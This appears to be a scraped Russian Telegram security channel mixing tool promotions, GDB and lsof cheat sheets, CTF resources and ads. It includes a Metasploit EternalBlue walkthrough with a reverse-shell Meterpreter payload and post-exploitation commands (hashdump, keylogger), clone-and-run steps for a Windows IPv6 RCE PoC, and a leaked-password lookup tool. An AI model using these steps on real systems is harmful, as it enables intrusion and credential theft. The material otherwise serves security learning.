CodeGuard: CyberSec Edition

Эй, ты! 🫵 А ну быстро выключи свой VPN! • Этот пароль — слишком простой! Взломают! • Эту ссылку — открывать нельзя! Фишинг! • Сюда — данные не вводи! Мошенники! Цифровой мир стремительно меняется, а угрозы конфиденциальности становятся тотальными. Вот только 95% пользователей — беспечны и годами игнорируют базовые правила безопасности, пока не потеряют свои аккаунты. Лишь малая часть общества вовремя защищает свои данные и читает незаменимый сегодня «Пакет безопасности». Это №1 ресурс в Telegram про цифровую гигиену, кибербезопасность и стабильный доступ в интернет. Уверяем, с каждым днём канал будет только актуальнее — такова реальность цифровой эпохи, в которой мы живём. Так что лучше подпишись сейчас: @package_security

🐙 h4cker — 10 000+ ресурсов по этичному хакингу Тысячи скриптов, чек-листов и обучающих материалов от Омара Сантоса — эксперта с 20+ годами в ИБ 🔗 GitHub ⭐️ 22k+ звёзд Что внутри:

👉AI Security — защита LLM, тестирование на инъекции, AI Red Teaming 👉Certifications — дорожные карты для OSCP, CISSP, облачных сертификаций 👉Build Your Own Lab — создание домашних полигонов 👉Cybersecurity Domains — фундаментальные знания по всем направлениям 👉Training Reference — шпаргалки, книги, тулзы

Как использовать: Склонируйте репозиторий и выбирайте разделы под свои задачи. Сохраняйте — заменит десятки закладок. 😈 CodeGuard: PySec Edition | Чат

🐞 Шпаргалка по GDB — отладка бинарников из консоли 1. Запуск программы в GDB:

gdb ./program

2. Точки останова:

break main          # поставить брейк на main
break *0x401234     # поставить брейк по адресу
info breakpoints    # посмотреть все брейки
delete 1            # удалить брейк #1

3. Запуск и выполнение:

run                 # запустить
run arg1 arg2       # с аргументами
continue            # продолжить после брейка
stepi               # одна инструкция (шаг внутрь)
nexti               # одна инструкция (шаг с обходом вызовов)

4. Просмотр регистров и памяти:

info registers      # все регистры
p $eax              # значение регистра eax
x/10x $rsp          # 10 слов памяти по адресу rsp
x/s $rdi            # строка по адресу rdi

5. Анализ после сбоя (core dump):

gdb ./program core
bt                  # backtrace (стек вызовов)
frame 2             # перейти во второй фрейм
info locals         # локальные переменные

6. Полезное:

set disassembly-flavor intel   # синтаксис Intel вместо AT&T
disass main                    # дизассемблировать функцию

Сохраняйте🔖 😈 CodeGuard: PySec Edition | Чат

🏆 CTF Arsenal — 50+ тулзов в браузере для CTF и пентеста Хватит открывать 20 вкладок. CTF Arsenal собирает всё в одном дашборде. Что внутри:

🔵15+ тулзов по крипте: base64, хеши, шифры, генераторы паролей 🔵10+ для веба: SQLi пейлоады, XSS, JWT декодер, HTTP анализ 🔵12+ форензика: метаданные, стеганография (LSB), анализ PCAP 🔵8+ реверс-инжиниринг / PWN: ROP гаджеты, шеллкод, BOF паттерны

🔗 GitHub ⭐️ новинка 2025 Как запустить (без установки): ctf-arsenal.replit.app 😈 CodeGuard: PySec Edition | Чат

📡 5 площадок для CTF-соревнований (бесплатно) 1. picoCTF — от университета Карнеги-Меллон. Лучший старт для новичков. Ссылка 2. CTFtime — агрегатор всех CTF в мире. Календарь, команды, рейтинги. Ссылка 3. RingZer0 — онлайн-площадка с тысячами задач (SQLi, крипто, форензика). Ссылка 4. TryHackMe CTF — комнаты с таймером, как на настоящих соревнованиях. Ссылка 5. HackTheBox CTF — регулярные соревнования на реальных машинах. Ссылка 🎁 Бонус: Начните с picoCTF — там есть гайды для полных новичков. 😈 CodeGuard: PySec Edition | Чат

🎯 Metasploit за 5 минут — первый эксплойт Текст: 1. Запуск:

sudo msfconsole

2. Поиск модуля для EternalBlue (MS17-010):

search ms17-010

3. Используем модуль:

use exploit/windows/smb/ms17_010_eternalblue

4. Настройка (IP цели и своя слушающая машина):

set RHOSTS 192.168.1.100
set LHOST 192.168.1.50
set PAYLOAD windows/x64/meterpreter/reverse_tcp

5. Атака:

run

6. Получили Meterpreter shell:

sysinfo
getuid
shell

Полезные команды внутри Meterpreter: hashdump — вытащить хеши паролей screenshot — скриншот экрана жертвы keyscan_start / keyscan_dump — кейлоггер upload /file /путь — загрузить файл ⚠️ Только на своих системах или с разрешения. 😈 CodeGuard: PySec Edition | Чат

🥷 Ищем ИБ и OSINT специалистов. Релокейт, удалёнка, платим много! - Вакансии которых нет на джоб-агрегаторах - Только прямые контакты HR в Telegram 👉 @jobs_ib 🤖 ML & DS 👩‍💻 DevOps 👨‍✈️ ИБ & OSINT 👣 Go 👩‍💻 Mobile 👩‍💻 C# 👩‍💻 Node.js 👩‍💻 Python 🔎 QA 👩‍💻 Java 👩‍💻 UX/UI 👩‍💻 Frontend 🖼️ PHP 📋 Analyst 💼 1C 🖥 SQL 👩‍💻 IT HR Пока другие листают джоб-сайты — ты уже пишешь HR в Telegram.

⚔️ MITRE ATT&CK Navigator — визуализируй покрытие техник атак Планируете тест на проникновение или проверяете, насколько SOC готов к реальным атакам? 🔗 Сайт Что это: Интерактивная тепловая карта всех тактик и техник MITRE ATT&CK Как использовать:

👉Оцените покрытие вашей защиты (синие команды) 👉Спланируйте, какие техники использовать в Red Team 👉Экспортируйте/импортируйте слой в JSON

Для кого: Синих команд (проверить детекцию техник), красных команд (спланировать маршрут атаки), аналитиков угроз. Почему удобно: Можно добавить скоринг, комментарии и цвета для каждой техники. 😈 CodeGuard: PySec Edition | Чат

🤩 Мы для вас нашли лютый блог Ибэшника, который ведёт человек с 15-ти летним стажем работы. В канале он рассказывает: 🟢Какими инструментами он пользуется при работе 🟢Какими законными и подзаконными актами он руководствуется 🟢Как правильно делать обращения в ФСТЭК 🟢Так же рассказывает о инцидентах, с которыми встречается при работе 🫵 Карманный хакер — твой путеводитель в мир ИБ!

💀 CVE-2024-38063 — Zero-click RCE через IPv6 в Windows Август 2024. Уязвимость в Windows IPv6 stack позволяет удалённо выполнить код без клика и даже без логина . CVSS: 9.8 (критическая) Суть: Целочисленный андерфлоу в tcpip.sys. Один неправильный IPv6-пакет с фрагментами — и ядро падает (BSOD) или открывает доступ . Где искать: Windows 10/11 c выключенными обновлениями за август 2024. Особенно серверы, где IPv6 не отключали. Как проверить: Запустить PoC на Linux против целевой Windows (только на своих тестовых!) :

git clone https://github.comAvidan1/CVE-2024-38063
python3 CVE-2024-38063.py

Что искать в логах: BSOD stop code 0x00000001 в tcpip.sys Фикс: Поставить патч от Microsoft (август 2024) или отключить IPv6 . Почему страшно: Это zero-click — вам даже не надо открывать письмо или переходить по ссылке. Достаточно получить IPv6-пакет по сети 😈 CodeGuard: PySec Edition | Чат

Кто платит за последствия кибератаки? Российский бизнес всё чаще сталкивается не только с угрозой взлома, но и с финансовыми потерями после инцидентов. При этом рынок киберстрахования до сих пор остаётся серой зоной для многих компаний. Кибердом запускает исследование практик управления киберрисками, чтобы понять, как бизнес сегодня: ✔️ распределяет ответственность; ✔️ компенсирует убытки; ✔️ инвестирует в защиту; ✔️ использует киберстрахование на практике. К участию приглашаются CISO, IT-директора, руководители и специалисты в сфере кибербезопасности. 🔥 Пройти опрос Опрос анонимный. Результаты исследования будут представлены на закрытом мероприятии в Кибердоме, а участники получат приглашение и доступ к аналитике рынка. #реклама О рекламодателе

🚀 GoSearch — шерлок на стероидах (ищет ещё и утечки паролей) Sherlock хорош, но умирает. GoSearch написан на Go, летает быстрее и ищет глубже . Что умеет:

🔵Ищет по 300+ сайтам (соцсети, GitHub, форумы) 🔵Проверяет 900k утекших паролей через HudsonRock API 🔵Ищет по ProxyNova (3.2 млрд записей) и BreachDirectory (18 млрд) 🔵Пытается взломать пароли через Weakpass

Установка:

git clone https://github.com/ibnaleem/gosearch cd gosearch go build

Запуск:

./gosearch -u username --no-false-positives

Фишка против Sherlock: Цветовая индикация — жёлтые результаты под вопросом, зелёные — 100% попадание 😈 CodeGuard: PySec Edition | Чат

🔐 Когда NGFW становится единой точкой отказа, под угрозой уже не только firewall, а вся инфраструктура. Если межсетевой экран перестаёт отвечать, пользователи теряют доступ к сервисам, сегменты сети изолируются, а простой превращается в проблему для бизнеса. ✅ 10 июня на бесплатном практическом вебинаре УЦ «Фаст Лейн» разберём отказоустойчивость UserGate NGFW и что происходит при переключении узлов кластера. Программа: 🔹 FHRP-протоколы и VRRP 🔹 Active-passive и active-active 🔹 Условия переключения: отказ интерфейса, потеря шлюза, смена роли 🔹 GARP и ARP-таблицы клиентов 🔹 Анализ VRRP и ARP-трафика в Wireshark Кому полезно: сетевым инженерам, ИБ-специалистам, системным администраторам, пользователям UserGate NGFW. Ведущий - практикующий эксперт, сертифицированный инструктор UserGate, Eltex и «Код Безопасности». 📅 10 июня | 12:00 или 19:00 (МСК) 🔗 Зарегистрироваться. #реклама О рекламодателе

🐙 Awesome Infosec — коллекция бесплатных курсов по кибербезопасности Хотите учиться, но не знаете, с чего начать? Готовый список лучших бесплатных материалов. 🔗 GitHub ⭐️1k+ Что внутри: Кураторская подборка ресурсов — от академических курсов до лабораторий и CTF. Разделы:

🔵Massive Online Open Courses — Computer Security от Stanford, криптография, хардверная безопасность  🔵Academic Courses — NYU Tandon Hack Night, Offensive Computer Security от FSU, Exploitation от RPI  🔵Laboratories — практические стенды 🔵CTF — площадки для тренировок 🔵SecurityTube Playlists — видео-лекции

Кому зайдёт: Новичкам и профессионалам, которые хотят систематизировать знания. 😈 CodeGuard: PySec Edition | Чат

👩‍💻 Всем программистам посвящается! Вот 14 авторских обучающих IT каналов по самым востребованным областям программирования: Выбирай своё направление: 👩‍💻 Python — t.me/python_ready 🤔 InfoSec & Хакинг — t.me/hacking_ready 🖥 SQL & Базы Данных — t.me/sql_ready 👩‍💻 IT Новости — t.me/it_ready 🤖 AI & ML — t.me/neuro_ready 👩‍💻 Frontend — t.me/frontend_ready 👩‍💻 C/C++ — https://t.me/cpp_ready 👩‍💻 C# & Unity — t.me/csharp_ready 👩‍💻 Linux — t.me/linux_ready 👩‍💻 Java — t.me/java_ready 📖 IT Книги — t.me/books_ready 📱 JavaScript — t.me/javascript_ready 🖼️ DevOps — t.me/devops_ready 🖥 Design — t.me/design_ready 📌 Гайды, шпаргалки, задачи, ресурсы и фишки для каждого языка программирования!

🔍 Шпаргалка по lsof — кто и что открыл в системе 1. Какие файлы открыты у процесса:

lsof -p [PID]

2. Какой процесс слушает порт:

lsof -i :80

3. Все сетевые соединения:

lsof -i -P -n

4. Кто открыл файл (и удалил, но не закрыл):

lsof /path/to/file

5. Открытые файлы пользователя:

lsof -u username

6. Все процессы, которые используют папку (даже если она удалена):

lsof +D /path/to/folder

7. Найти свой SSH-ключ в памяти процессов:

lsof | grep "id_rsa"

8. Сетевые соединения с деталями процессов:

lsof -i -n -P | grep ESTABLISHED

Сохраняйте 🔖 😈 CodeGuard: PySec Edition | Чат

⚔️ Legion — графический пентест-фреймворк на Python 🔗 GitHub  ⭐️ 1k+ Что внутри: Готовый инструмент для автоматизации пентеста с веб-интерфейсом. В основе — Nmap, Nikto, Hydra, Dirb, что есть в Kali. Особенности:

🔵Автоматическое сканирование портов и сервисов 🔵Поиск уязвимостей через базу CVE 🔵Генерация отчётов 🔵Легко развернуть в Docker

Установка:

git clone https://github.com/GoVanguard/legion.git
cd legion
sudo ./start-legion.sh

😈 CodeGuard: PySec Edition | Чат

Сетка работает красиво до первого движения рынка А вот SilentGain не обещает вам сказку про кнопку 😬 БАБЛО 🚫 Здесь показывают, как автоматическая стратегия работает на реальных сделках: где плюс, где просадка, где стоит защита и почему доходность не бывает без риска. 📉 В проекте разбирают торговлю на золоте так, чтобы было понятно даже детям. Переходи в бесплатного бота. Без подписок. Без настроек. ⤵️ https://t.me/+Lu-4K0h4-H41YjNi

🐧 Прохождение Bashed (HackTheBox): от веб-шелла до Root 🔗 Ссылка Практический разбор одного из лучших стартовых стендов для новичков — машины Bashed . Что вас ждет в этом видео: ⚫️Начальная атака: Находим скрытую папку /dev и получаем доступ к веб-шеллу phpbash . ⚫️Повышение привилегий: Находим пользователя scriptmanager, который может выполнять всё без пароля (sudo -l) . ⚫️Результат: Модифицируем Python-скрипт, который запускается от имени root по расписанию, и получаем полный контроль над системой . Для кого: Идеально для новичков и тех, кто готовится к сертификации OSCP. 😈 CodeGuard: PySec Edition | Чат

🛠 Pentest-Tools — веб-интерфейс для пентеста 🔗 Сайт Что внутри: 20+ инструментов в браузере — сканирование портов, брутфорс, проверка SQLi, XSS, SSRF, whois, DNS. Чем удобно:

🔵Не нужно ничего устанавливать 🔵Есть бесплатные лимиты 🔵Интеграция с API

Для кого: Новичкам и тем, у кого нет доступа к мощному железу. 🎁 Бонусный инструмент: Проверка заголовков безопасности — покажет, какие заголовки (CSP, HSTS, X-Frame-Options) отсутствуют на сайте. 😈 CodeGuard: PySec Edition | Чат